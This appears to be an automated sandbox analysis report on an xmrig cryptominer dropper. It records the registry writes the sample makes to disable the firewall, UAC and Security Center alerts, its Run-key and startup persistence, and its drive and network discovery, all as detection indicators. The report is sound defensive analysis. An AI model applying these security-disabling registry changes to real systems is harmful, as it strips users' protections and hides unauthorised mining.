xmrig | 2bfe501031c14858507f0cc09a4312ca438b521f16fa83e90f93b067a929aaab

Analysis

max time kernel
123s
max time network
864s
platform
windows7_x64
resource
win7v20201028
submitted
06-03-2021 22:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Size

2.3MB
MD5

921379bd587ab29da4dc23fb9d47fe36
SHA1

e9db1731731503a81a2fdc67ffa005e6aa2a8038
SHA256

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
SHA512

90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc

Score

10^/10

xmrig evasion miner persistence trojan upx

Malware Config

Signatures

Modifies firewall policy service 2 TTPs 12 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

XMRig Miner Payload 8 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe	xmrig
\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe	xmrig
\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe	xmrig
behavioral5/memory/1372-31-0x0000000000400000-0x00000000009E7000-memory.dmp	xmrig
C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe	xmrig
\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe	xmrig
\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe	xmrig
behavioral5/memory/1372-31-0x0000000000400000-0x00000000009E7000-memory.dmp	xmrig

Executes dropped EXE 4 IoCs

Processes:

VID001.exeuihost64.exeVID001.exeuihost64.exe

pid process

1596 VID001.exe
1372 uihost64.exe
1596 VID001.exe
1372 uihost64.exe

pid	process
1596	VID001.exe
1372	uihost64.exe
1596	VID001.exe
1372	uihost64.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral5/memory/1804-3-0x0000000001F10000-0x0000000002F9E000-memory.dmp	upx
behavioral5/memory/1596-10-0x0000000001F30000-0x0000000002FBE000-memory.dmp	upx
behavioral5/memory/1804-3-0x0000000001F10000-0x0000000002F9E000-memory.dmp	upx
behavioral5/memory/1596-10-0x0000000001F30000-0x0000000002FBE000-memory.dmp	upx

Deletes itself 2 IoCs

Processes:

VID001.exeVID001.exe

pid process

1596 VID001.exe
1596 VID001.exe

pid	process
1596	VID001.exe
1596	VID001.exe

Drops startup file 2 IoCs

Processes:

VID001.exeVID001.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	VID001.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	VID001.exe

Loads dropped DLL 12 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.execonhost.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.execonhost.exe

pid	process
1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1568	conhost.exe
1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1568	conhost.exe

Windows security modification 2 TTPs 28 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	VID001.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\Svc	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	VID001.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\Svc	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\Svc	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	VID001.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\Svc	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

VID001.exeVID001.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\	VID001.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run	VID001.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\	VID001.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	VID001.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\	VID001.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run	VID001.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\	VID001.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	VID001.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	VID001.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

VID001.exeVID001.exe

description	ioc	process
File opened (read-only)	\??\P:	VID001.exe
File opened (read-only)	\??\E:	VID001.exe
File opened (read-only)	\??\H:	VID001.exe
File opened (read-only)	\??\L:	VID001.exe
File opened (read-only)	\??\M:	VID001.exe
File opened (read-only)	\??\O:	VID001.exe
File opened (read-only)	\??\S:	VID001.exe
File opened (read-only)	\??\K:	VID001.exe
File opened (read-only)	\??\V:	VID001.exe
File opened (read-only)	\??\R:	VID001.exe
File opened (read-only)	\??\Y:	VID001.exe
File opened (read-only)	\??\E:	VID001.exe
File opened (read-only)	\??\N:	VID001.exe
File opened (read-only)	\??\S:	VID001.exe
File opened (read-only)	\??\U:	VID001.exe
File opened (read-only)	\??\Z:	VID001.exe
File opened (read-only)	\??\R:	VID001.exe
File opened (read-only)	\??\T:	VID001.exe
File opened (read-only)	\??\X:	VID001.exe
File opened (read-only)	\??\M:	VID001.exe
File opened (read-only)	\??\N:	VID001.exe
File opened (read-only)	\??\T:	VID001.exe
File opened (read-only)	\??\H:	VID001.exe
File opened (read-only)	\??\Q:	VID001.exe
File opened (read-only)	\??\V:	VID001.exe
File opened (read-only)	\??\I:	VID001.exe
File opened (read-only)	\??\U:	VID001.exe
File opened (read-only)	\??\F:	VID001.exe
File opened (read-only)	\??\O:	VID001.exe
File opened (read-only)	\??\W:	VID001.exe
File opened (read-only)	\??\Y:	VID001.exe
File opened (read-only)	\??\F:	VID001.exe
File opened (read-only)	\??\P:	VID001.exe
File opened (read-only)	\??\Z:	VID001.exe
File opened (read-only)	\??\I:	VID001.exe
File opened (read-only)	\??\L:	VID001.exe
File opened (read-only)	\??\X:	VID001.exe
File opened (read-only)	\??\G:	VID001.exe
File opened (read-only)	\??\J:	VID001.exe
File opened (read-only)	\??\G:	VID001.exe
File opened (read-only)	\??\K:	VID001.exe
File opened (read-only)	\??\Q:	VID001.exe
File opened (read-only)	\??\W:	VID001.exe
File opened (read-only)	\??\J:	VID001.exe

Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media
T1091

Drops file in Program Files directory 10 IoCs

Processes:

VID001.exeVID001.exe

description	ioc	process
File opened for modification	C:\PROGRAM FILES\7-ZIP\7z.exe	VID001.exe
File opened for modification	C:\PROGRAM FILES\7-ZIP\7zFM.exe	VID001.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe	VID001.exe
File opened for modification	C:\PROGRAM FILES\7-ZIP\7z.exe	VID001.exe
File opened for modification	C:\PROGRAM FILES\7-ZIP\7zFM.exe	VID001.exe
File opened for modification	C:\PROGRAM FILES\7-ZIP\7zG.exe	VID001.exe
File opened for modification	C:\PROGRAM FILES\7-ZIP\Uninstall.exe	VID001.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe	VID001.exe
File opened for modification	C:\PROGRAM FILES\7-ZIP\7zG.exe	VID001.exe
File opened for modification	C:\PROGRAM FILES\7-ZIP\Uninstall.exe	VID001.exe

Drops file in Windows directory 2 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

description	ioc	process
File opened for modification	C:\Windows\SYSTEM.INI	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
File opened for modification	C:\Windows\SYSTEM.INI	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 16 IoCs

installer

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_1
\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\0F745BB7_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\0F745BB7_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	nsis_installer_2
\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_1
\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\0F745BB7_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\0F745BB7_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	nsis_installer_2

Discovers systems in the same network 1 TTPs 14 IoCs

discovery

Remote System Discovery

T1018

Processes:

net.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

pid	process
1048	net.exe
432	net.exe
1620	net.exe
1752	net.exe
1620	net.exe
1752	net.exe
1048	net.exe
2424	net.exe
2748	net.exe
432	net.exe
2748	net.exe
2424	net.exe
2960	net.exe
2960	net.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.execmd.exenet.exexcopy.execmd.exenet.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	net.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	net.exe

Kills process with taskkill 10 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1092	taskkill.exe
1020	taskkill.exe
1092	taskkill.exe
2168	taskkill.exe
956	taskkill.exe
2168	taskkill.exe
956	taskkill.exe
1020	taskkill.exe
1140	taskkill.exe
1140	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
1012	PING.EXE
2428	PING.EXE
2844	PING.EXE
2396	PING.EXE
2580	PING.EXE
964	PING.EXE
2480	PING.EXE
2264	PING.EXE
2404	PING.EXE
1092	PING.EXE
2016	PING.EXE
1980	PING.EXE
936	PING.EXE
2776	PING.EXE
2616	PING.EXE
2600	PING.EXE
188	PING.EXE
2696	PING.EXE
2764	PING.EXE
2088	PING.EXE
1792	PING.EXE
2320	PING.EXE
2232	PING.EXE
1896	PING.EXE
2660	PING.EXE
2088	PING.EXE
1184	PING.EXE
2984	PING.EXE
2912	PING.EXE
1608	PING.EXE
2064	PING.EXE
3032	PING.EXE
2856	PING.EXE
2780	PING.EXE
3060	PING.EXE
2680	PING.EXE
1780	PING.EXE
2912	PING.EXE
2952	PING.EXE
2020	PING.EXE
1600	PING.EXE
2020	PING.EXE
2356	PING.EXE
1792	PING.EXE
2020	PING.EXE
2016	PING.EXE
2936	PING.EXE
2544	PING.EXE
1684	PING.EXE
3032	PING.EXE
2016	PING.EXE
2204	PING.EXE
936	PING.EXE
300	PING.EXE
588	PING.EXE
2512	PING.EXE
2956	PING.EXE
2852	PING.EXE
2360	PING.EXE
384	PING.EXE
2372	PING.EXE
2320	PING.EXE
3028	PING.EXE
2624	PING.EXE

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

pid	process
1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe
1596	VID001.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exetaskkill.exePING.EXEtaskkill.exetaskkill.exeuihost64.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

description	pid	process
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	1092	PING.EXE
Token: SeDebugPrivilege	1020	taskkill.exe
Token: SeDebugPrivilege	1140	taskkill.exe
Token: SeLockMemoryPrivilege	1372	uihost64.exe
Token: SeLockMemoryPrivilege	1372	uihost64.exe
Token: SeDebugPrivilege	1596	VID001.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
